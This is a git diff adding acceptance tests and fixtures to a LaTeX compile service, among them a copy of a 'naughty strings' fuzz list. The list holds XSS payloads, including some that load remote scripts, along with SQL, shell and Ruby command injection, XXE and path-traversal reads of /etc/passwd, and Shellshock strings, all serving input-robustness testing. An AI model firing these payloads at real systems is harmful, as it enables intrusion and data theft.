--- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/tikz_feynman/output.pdfxref @@ -0,0 +1,35 @@ +1/0: uncompressed; offset = 2924 +2/0: uncompressed; offset = 3039 +3/0: uncompressed; offset = 4606 +4/0: uncompressed; offset = 4721 +5/0: uncompressed; offset = 7754 +6/0: uncompressed; offset = 7870 +7/0: uncompressed; offset = 11668 +8/0: uncompressed; offset = 21077 +9/0: uncompressed; offset = 28498 +10/0: uncompressed; offset = 35464 +11/0: uncompressed; offset = 35699 +12/0: uncompressed; offset = 15 +13/0: uncompressed; offset = 216 +14/0: uncompressed; offset = 703 +15/0: uncompressed; offset = 754 +16/0: uncompressed; offset = 909 +17/0: uncompressed; offset = 1026 +18/0: uncompressed; offset = 2161 +19/0: compressed; stream = 18, index = 0 +20/0: compressed; stream = 18, index = 1 +21/0: compressed; stream = 18, index = 2 +22/0: compressed; stream = 18, index = 3 +23/0: compressed; stream = 18, index = 4 +24/0: compressed; stream = 18, index = 5 +25/0: compressed; stream = 18, index = 6 +26/0: compressed; stream = 18, index = 7 +27/0: compressed; stream = 18, index = 8 +28/0: compressed; stream = 18, index = 9 +29/0: compressed; stream = 18, index = 10 +30/0: compressed; stream = 18, index = 11 +31/0: compressed; stream = 18, index = 12 +32/0: compressed; stream = 18, index = 13 +33/0: compressed; stream = 18, index = 14 +34/0: compressed; stream = 18, index = 15 +35/0: compressed; stream = 18, index = 16 diff --git a/services/clsi/test/acceptance/fixtures/examples/xelatex_compiler/Zapfino.ttf b/services/clsi/test/acceptance/fixtures/examples/xelatex_compiler/Zapfino.ttf new file mode 100644 index 0000000..b683280 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/xelatex_compiler/Zapfino.ttf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/xelatex_compiler/main.tex b/services/clsi/test/acceptance/fixtures/examples/xelatex_compiler/main.tex new file mode 100644 index 0000000..ad9438a --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/xelatex_compiler/main.tex @@ -0,0 +1,7 @@ +\documentclass[11pt]{article} +\usepackage{fontspec} +\setmainfont[Ligatures=TeX]{Zapfino.ttf} +\begin{document} +The quick brown fox jumps over the lazy dog +\end{document} + diff --git a/services/clsi/test/acceptance/fixtures/examples/xelatex_compiler/options.json b/services/clsi/test/acceptance/fixtures/examples/xelatex_compiler/options.json new file mode 100644 index 0000000..a2e0c09 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/xelatex_compiler/options.json @@ -0,0 +1,3 @@ +{ + "compiler": "xelatex" +} diff --git a/services/clsi/test/acceptance/fixtures/examples/xelatex_compiler/output.pdf b/services/clsi/test/acceptance/fixtures/examples/xelatex_compiler/output.pdf new file mode 100644 index 0000000..846b388 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/xelatex_compiler/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/xelatex_compiler/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/xelatex_compiler/output.pdfxref new file mode 100644 index 0000000..20aa4ba --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/xelatex_compiler/output.pdfxref @@ -0,0 +1,19 @@ +1/0: uncompressed; offset = 8578 +2/0: uncompressed; offset = 15 +3/0: uncompressed; offset = 216 +4/0: uncompressed; offset = 658 +5/0: uncompressed; offset = 708 +6/0: uncompressed; offset = 837 +7/0: uncompressed; offset = 940 +8/0: uncompressed; offset = 1191 +9/0: uncompressed; offset = 1627 +10/0: uncompressed; offset = 7676 +11/0: uncompressed; offset = 7784 +12/0: uncompressed; offset = 7822 +13/0: compressed; stream = 12, index = 0 +14/0: compressed; stream = 12, index = 1 +15/0: compressed; stream = 12, index = 2 +16/0: compressed; stream = 12, index = 3 +17/0: compressed; stream = 12, index = 4 +18/0: compressed; stream = 12, index = 5 +19/0: compressed; stream = 12, index = 6 diff --git a/services/clsi/test/acceptance/fixtures/lion.png b/services/clsi/test/acceptance/fixtures/lion.png new file mode 100644 index 0000000..64eb549 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/lion.png differ diff --git a/services/clsi/test/acceptance/fixtures/minimal.pdf b/services/clsi/test/acceptance/fixtures/minimal.pdf new file mode 100644 index 0000000..d578e90 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/minimal.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/minimal.pdfxref b/services/clsi/test/acceptance/fixtures/minimal.pdfxref new file mode 100644 index 0000000..38b6e8f --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/minimal.pdfxref @@ -0,0 +1,15 @@ +1/0: uncompressed; offset = 11784 +2/0: uncompressed; offset = 12033 +3/0: uncompressed; offset = 15 +4/0: uncompressed; offset = 216 +5/0: uncompressed; offset = 621 +6/0: uncompressed; offset = 671 +7/0: uncompressed; offset = 791 +8/0: uncompressed; offset = 906 +9/0: uncompressed; offset = 1070 +10/0: uncompressed; offset = 11235 +11/0: compressed; stream = 10, index = 0 +12/0: compressed; stream = 10, index = 1 +13/0: compressed; stream = 10, index = 2 +14/0: compressed; stream = 10, index = 3 +15/0: compressed; stream = 10, index = 4 diff --git a/services/clsi/test/acceptance/fixtures/naugty_strings.txt b/services/clsi/test/acceptance/fixtures/naugty_strings.txt new file mode 100644 index 0000000..92eb1dd --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/naugty_strings.txt @@ -0,0 +1,626 @@ +\documentclass{article} +\usepackage[utf8]{inputenc} + +\title{eee} +\author{henry.oswald } +\date{September 2015} + +\usepackage{natbib} +\usepackage{graphicx} + +\begin{document} + +\maketitle + +\section{Introduction} + +Encoding: utf8 + +# Reserved Strings +# +# Strings which may be used elsewhere in code + +undefined +undef +null +NULL +(null) +nil +NIL +true +false +True +False +None +\ +\\ + +# Numeric Strings +# +# Strings which can be interpreted as numeric + +0 +1 +1.00 +$1.00 +1/2 +1E2 +1E02 +1E+02 +-1 +-1.00 +-$1.00 +-1/2 +-1E2 +-1E02 +-1E+02 +1/0 +0/0 +-2147483648/-1 +-9223372036854775808/-1 +0.00 +0..0 +. +0.0.0 +0,00 +0,,0 +, +0,0,0 +0.0/0 +1.0/0.0 +0.0/0.0 +1,0/0,0 +0,0/0,0 +--1 +- +-. +-, +999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 +NaN +Infinity +-Infinity +0x0 +0xffffffff +0xffffffffffffffff +0xabad1dea +123456789012345678901234567890123456789 +1,000.00 +1 000.00 +1'000.00 +1,000,000.00 +1 000 000.00 +1'000'000.00 +1.000,00 +1 000,00 +1'000,00 +1.000.000,00 +1 000 000,00 +1'000'000,00 +01000 +08 +09 +2.2250738585072011e-308 + +# Special Characters +# +# Strings which contain common special ASCII characters (may need to be escaped) + +,./;'[]\-= +<>?:"{}|_+ +!@#$%^&*()`~ + +# Unicode Symbols +# +# Strings which contain common unicode symbols (e.g. smart quotes) + +Ω≈ç√∫˜µ≤≥÷ +åß∂ƒ©˙∆˚¬…æ +œ∑´®†¥¨ˆøπ“‘ +¡™£¢∞§¶•ªº–≠ +¸˛Ç◊ı˜Â¯˘¿ +ÅÍÎÏ˝ÓÔÒÚÆ☃ +Œ„´‰ˇÁ¨ˆØ∏”’ +`⁄€‹›fifl‡°·‚—± +⅛⅜⅝⅞ +ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя +٠١٢٣٤٥٦٧٨٩ + +# Unicode Subscript/Superscript +# +# Strings which contain unicode subscripts/superscripts; can cause rendering issues + +⁰⁴⁵ +₀₁₂ +⁰⁴⁵₀₁₂ + +# Quotation Marks +# +# Strings which contain misplaced quotation marks; can cause encoding errors + +' +" +'' +"" +'"' +"''''"'" +"'"'"''''" + +# Two-Byte Characters +# +# Strings which contain two-byte characters: can cause rendering issues or character-length issues + +田中さんにあげて下さい +パーティーへ行かないか +和製漢語 +部落格 +사회과학원 어학연구소 +찦차를 타고 온 펲시맨과 쑛다리 똠방각하 +社會科學院語學研究所 +울란바토르 +𠜎𠜱𠝹𠱓𠱸𠲖𠳏 + +# Japanese Emoticons +# +# Strings which consists of Japanese-style emoticons which are popular on the web + +ヽ༼ຈل͜ຈ༽ノ ヽ༼ຈل͜ຈ༽ノ +(。◕ ∀ ◕。) +`ィ(´∀`∩ +__ロ(,_,*) +・( ̄∀ ̄)・:*: +゚・✿ヾ╲(。◕‿◕。)╱✿・゚ +,。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’ +(╯°□°)╯︵ ┻━┻) +(ノಥ益ಥ)ノ ┻━┻ +( ͡° ͜ʖ ͡°) + +# Emoji +# +# Strings which contain Emoji; should be the same behavior as two-byte characters, but not always + +😍 +👩🏽 +👾 🙇 💁 🙅 🙆 🙋 🙎 🙍 +🐵 🙈 🙉 🙊 +❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙 +✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿 +🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧 +0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟 + +# Unicode Numbers +# +# Strings which contain unicode numbers; if the code is localized, it should see the input as numeric + +123 +١٢٣ + +# Right-To-Left Strings +# +# Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew) + +ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو. +בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ +הָיְתָהtestالصفحات التّحول +﷽ +ﷺ + +# Unicode Spaces +# +# Strings which contain unicode space characters with special properties (c.f. https://www.cs.tut.fi/~jkorpela/chars/spaces.html) + +​ +  +᠎ +  + +␣ +␢ +␡ + +# Trick Unicode +# +# Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf) + +‪‪test‪ +‫test‫ +
test
 +test⁠test‫ +⁦test⁧ + +# Zalgo Text +# +# Strings which contain "corrupted" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net) + +Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣ +̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰ +̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟ +̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕ +Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮ + +# Unicode Upsidedown +# +# Strings which contain unicode with an "upsidedown" effect (via http://www.upsidedowntext.com) + +˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥ +00˙Ɩ$- + +# Unicode font +# +# Strings which contain bold/italic/etc. versions of normal characters + +The quick brown fox jumps over the lazy dog +𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠 +𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌 +𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈 +𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰 +𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘 +𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐 +⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢ + +# Script Injection +# +# Strings which attempt to invoke a benign script injection; shows vulnerability to XSS + + +<script>alert('123');</script> + + +"> +'> +> + +< / script >< script >alert(123)< / script > + onfocus=JaVaSCript:alert(123) autofocus +" onfocus=JaVaSCript:alert(123) autofocus +' onfocus=JaVaSCript:alert(123) autofocus +<script>alert(123)</script> +ript>alert(123)ript> +--> +";alert(123);t=" +';alert(123);t=' +JavaSCript:alert(123) +;alert(123); +src=JaVaSCript:prompt(132) +">javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +'`"><\x3Cscript>javascript:alert(1) +'`"><\x00script>javascript:alert(1) +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +XXX + + + +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> +<!--[if]><script>javascript:alert(1)</script --> +<!--[if<img src=x onerror=javascript:alert(1)//]> --> +<script src="/\%(jscript)s"></script> +<script src="\\%(jscript)s"></script> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG SRC=# onmouseover="alert('xxs')"> +<IMG SRC= onmouseover="alert('xxs')"> +<IMG onmouseover="alert('xxs')"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav ascript:alert('XSS');"> +perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out +<IMG SRC="  javascript:alert('XSS');"> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> +<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<<SCRIPT>alert("XSS");//<</SCRIPT> +<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > +<SCRIPT SRC=//ha.ckers.org/.j> +<IMG SRC="javascript:alert('XSS')" +<iframe src=http://ha.ckers.org/scriptlet.html < +\";alert('XSS');// +<plaintext> + +# SQL Injection +# +# Strings which can cause a SQL injection if inputs are not sanitized + +1;DROP TABLE users +1'; DROP TABLE users-- 1 +' OR 1=1 -- 1 +' OR '1'='1 + +# Server Code Injection +# +# Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153) + +- +-- +--version +--help +$USER +/dev/null; touch /tmp/blns.fail ; echo +`touch /tmp/blns.fail` +$(touch /tmp/blns.fail) +@{[system "touch /tmp/blns.fail"]} + +# Command Injection (Ruby) +# +# Strings which can call system commands within Ruby/Rails applications + +eval("puts 'hello world'") +System("ls -al /") +`ls -al /` +Kernel.exec("ls -al /") +Kernel.exit(1) +%x('ls -al /') + +# XXE Injection (XML) +# +# String which can reveal system files when parsed by a badly configured XML parser + +<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> + +# Unwanted Interpolation +# +# Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string. + +$HOME +$ENV{'HOME'} +%d +%s +%*.*s + +# File Inclusion +# +# Strings which can cause user to pull in files that should not be a part of a web server + +../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../etc/hosts + +# Known CVEs and Vulnerabilities +# +# Strings that test for known vulnerabilities + +() { 0; }; touch /tmp/blns.shellshock1.fail; +() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; } + +# MSDOS/Windows Special Filenames +# +# Strings which are reserved characters in MSDOS/Windows + +CON +PRN +AUX +CLOCK$ +NUL +A: +ZZ: +COM1 +LPT1 +LPT2 +LPT3 +COM2 +COM3 +COM4 + +# Scunthorpe Problem +# +# Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem) + +Scunthorpe General Hospital +Penistone Community Church +Lightwater Country Park +Jimmy Clitheroe +Horniman Museum +shitake mushrooms +RomansInSussex.co.uk +http://www.cum.qc.ca/ +Craig Cockburn, Software Specialist +Linda Callahan +Dr. Herman I. Libshitz +magna cum laude +Super Bowl XXX +medieval erection of parapets +evaluate +mocha +expression +Arsenal canal +classic +Tyson Gay + +# Human injection +# +# Strings which may cause human to reinterpret worldview + +If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you. + +# Terminal escape codes +# +# Strings which punish the fools who use cat/type on this file + +Roses are red, violets are blue. Hope you enjoy terminal hue +But now...for my greatest trick... +The quick brown fox... [Beeeep] + +# iOS Vulnerability +# +# Strings which crashed iMessage in iOS versions 8.3 and earlier + +Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗 + + +\end{document} diff --git a/services/clsi/test/acceptance/js/AllowedImageNamesTests.js b/services/clsi/test/acceptance/js/AllowedImageNamesTests.js new file mode 100644 index 0000000..897f5d9 --- /dev/null +++ b/services/clsi/test/acceptance/js/AllowedImageNamesTests.js @@ -0,0 +1,187 @@ +const Client = require('./helpers/Client') +const ClsiApp = require('./helpers/ClsiApp') +const { expect } = require('chai') + +describe('AllowedImageNames', function () { + beforeEach(function (done) { + this.project_id = Client.randomId() + this.request = { + options: { + imageName: undefined, + }, + resources: [ + { + path: 'main.tex', + content: `\ +\\documentclass{article} +\\begin{document} +Hello world +\\end{document}\ +`, + }, + ], + } + ClsiApp.ensureRunning(done) + }) + + describe('with a valid name', function () { + beforeEach(function (done) { + this.request.options.imageName = process.env.TEXLIVE_IMAGE + + Client.compile(this.project_id, this.request, (error, res, body) => { + this.error = error + this.res = res + this.body = body + done(error) + }) + }) + it('should return success', function () { + expect(this.res.statusCode).to.equal(200) + }) + + it('should return a PDF', function () { + let pdf + try { + pdf = Client.getOutputFile(this.body, 'pdf') + } catch (e) {} + expect(pdf).to.exist + }) + }) + + describe('with an invalid name', function () { + beforeEach(function (done) { + this.request.options.imageName = 'something/evil:1337' + Client.compile(this.project_id, this.request, (error, res, body) => { + this.error = error + this.res = res + this.body = body + done(error) + }) + }) + it('should return non success', function () { + expect(this.res.statusCode).to.not.equal(200) + }) + + it('should not return a PDF', function () { + let pdf + try { + pdf = Client.getOutputFile(this.body, 'pdf') + } catch (e) {} + expect(pdf).to.not.exist + }) + }) + + describe('syncToCode', function () { + beforeEach(function (done) { + Client.compile(this.project_id, this.request, done) + }) + it('should error out with an invalid imageName', function (done) { + Client.syncFromCodeWithImage( + this.project_id, + 'main.tex', + 3, + 5, + 'something/evil:1337', + (error, body) => { + expect(String(error)).to.include('statusCode=400') + expect(body).to.equal('invalid image') + done() + } + ) + }) + + it('should produce a mapping a valid imageName', function (done) { + Client.syncFromCodeWithImage( + this.project_id, + 'main.tex', + 3, + 5, + process.env.TEXLIVE_IMAGE, + (error, result) => { + expect(error).to.not.exist + expect(result).to.deep.equal({ + pdf: [ + { + page: 1, + h: 133.768356, + v: 134.764618, + height: 6.918498, + width: 343.71106, + }, + ], + }) + done() + } + ) + }) + }) + + describe('syncToPdf', function () { + beforeEach(function (done) { + Client.compile(this.project_id, this.request, done) + }) + it('should error out with an invalid imageName', function (done) { + Client.syncFromPdfWithImage( + this.project_id, + 'main.tex', + 100, + 200, + 'something/evil:1337', + (error, body) => { + expect(String(error)).to.include('statusCode=400') + expect(body).to.equal('invalid image') + done() + } + ) + }) + + it('should produce a mapping a valid imageName', function (done) { + Client.syncFromPdfWithImage( + this.project_id, + 1, + 100, + 200, + process.env.TEXLIVE_IMAGE, + (error, result) => { + expect(error).to.not.exist + expect(result).to.deep.equal({ + code: [{ file: 'main.tex', line: 3, column: -1 }], + }) + done() + } + ) + }) + }) + + describe('wordcount', function () { + beforeEach(function (done) { + Client.compile(this.project_id, this.request, done) + }) + it('should error out with an invalid imageName', function (done) { + Client.wordcountWithImage( + this.project_id, + 'main.tex', + 'something/evil:1337', + (error, body) => { + expect(String(error)).to.include('statusCode=400') + expect(body).to.equal('invalid image') + done() + } + ) + }) + + it('should produce a texcout a valid imageName', function (done) { + Client.wordcountWithImage( + this.project_id, + 'main.tex', + process.env.TEXLIVE_IMAGE, + (error, result) => { + expect(error).to.not.exist + expect(result).to.exist + expect(result.texcount).to.exist + done() + } + ) + }) + }) +}) diff --git a/services/clsi/test/acceptance/js/BrokenLatexFileTests.js b/services/clsi/test/acceptance/js/BrokenLatexFileTests.js new file mode 100644 index 0000000..46d07da --- /dev/null +++ b/services/clsi/test/acceptance/js/BrokenLatexFileTests.js @@ -0,0 +1,124 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const Client = require('./helpers/Client') +const request = require('request') +const ClsiApp = require('./helpers/ClsiApp') +const { expect } = require('chai') + +describe('Broken LaTeX file', function () { + before(function (done) { + this.broken_request = { + resources: [ + { + path: 'main.tex', + content: `\ +\\documentclass{articl % :( +\\begin{documen % :( +Broken +\\end{documen % :(\ +`, + }, + ], + } + this.correct_request = { + resources: [ + { + path: 'main.tex', + content: `\ +\\documentclass{article} +\\begin{document} +Hello world +\\end{document}\ +`, + }, + ], + } + return ClsiApp.ensureRunning(done) + }) + + describe('on first run', function () { + before(function (done) { + this.project_id = Client.randomId() + return Client.compile( + this.project_id, + this.broken_request, + (error, res, body) => { + this.error = error + this.res = res + this.body = body + return done() + } + ) + }) + + it('should return a failure status', function () { + return this.body.compile.status.should.equal('failure') + }) + + it('should return isInitialCompile flag', function () { + expect(this.body.compile.stats.isInitialCompile).to.equal(1) + }) + + it('should return output files', function () { + // NOTE: No output.pdf file. + this.body.compile.outputFiles + .map(f => f.path) + .should.deep.equal([ + 'output.aux', + 'output.fdb_latexmk', + 'output.fls', + 'output.log', + 'output.stderr', + 'output.stdout', + ]) + }) + }) + + return describe('on second run', function () { + before(function (done) { + this.project_id = Client.randomId() + return Client.compile(this.project_id, this.correct_request, () => { + return Client.compile( + this.project_id, + this.broken_request, + (error, res, body) => { + this.error = error + this.res = res + this.body = body + return done() + } + ) + }) + }) + + it('should return a failure status', function () { + return this.body.compile.status.should.equal('failure') + }) + + it('should not return isInitialCompile flag', function () { + expect(this.body.compile.stats.isInitialCompile).to.not.exist + }) + + it('should return output files', function () { + // NOTE: No output.pdf file. + this.body.compile.outputFiles + .map(f => f.path) + .should.deep.equal([ + 'output.aux', + 'output.fdb_latexmk', + 'output.fls', + 'output.log', + 'output.stderr', + 'output.stdout', + ]) + }) + }) +}) diff --git a/services/clsi/test/acceptance/js/DeleteOldFilesTest.js b/services/clsi/test/acceptance/js/DeleteOldFilesTest.js new file mode 100644 index 0000000..09eea1a --- /dev/null +++ b/services/clsi/test/acceptance/js/DeleteOldFilesTest.js @@ -0,0 +1,72 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const Client = require('./helpers/Client') +const request = require('request') +const ClsiApp = require('./helpers/ClsiApp') + +describe('Deleting Old Files', function () { + before(function (done) { + this.request = { + resources: [ + { + path: 'main.tex', + content: `\ +\\documentclass{article} +\\begin{document} +Hello world +\\end{document}\ +`, + }, + ], + } + return ClsiApp.ensureRunning(done) + }) + + return describe('on first run', function () { + before(function (done) { + this.project_id = Client.randomId() + return Client.compile( + this.project_id, + this.request, + (error, res, body) => { + this.error = error + this.res = res + this.body = body + return done() + } + ) + }) + + it('should return a success status', function () { + return this.body.compile.status.should.equal('success') + }) + + return describe('after file has been deleted', function () { + before(function (done) { + this.request.resources = [] + return Client.compile( + this.project_id, + this.request, + (error, res, body) => { + this.error = error + this.res = res + this.body = body + return done() + } + ) + }) + + return it('should return a failure status', function () { + return this.body.compile.status.should.equal('failure') + }) + }) + }) +}) diff --git a/services/clsi/test/acceptance/js/ExampleDocumentTests.js b/services/clsi/test/acceptance/js/ExampleDocumentTests.js new file mode 100644 index 0000000..b463584 --- /dev/null +++ b/services/clsi/test/acceptance/js/ExampleDocumentTests.js @@ -0,0 +1,285 @@ 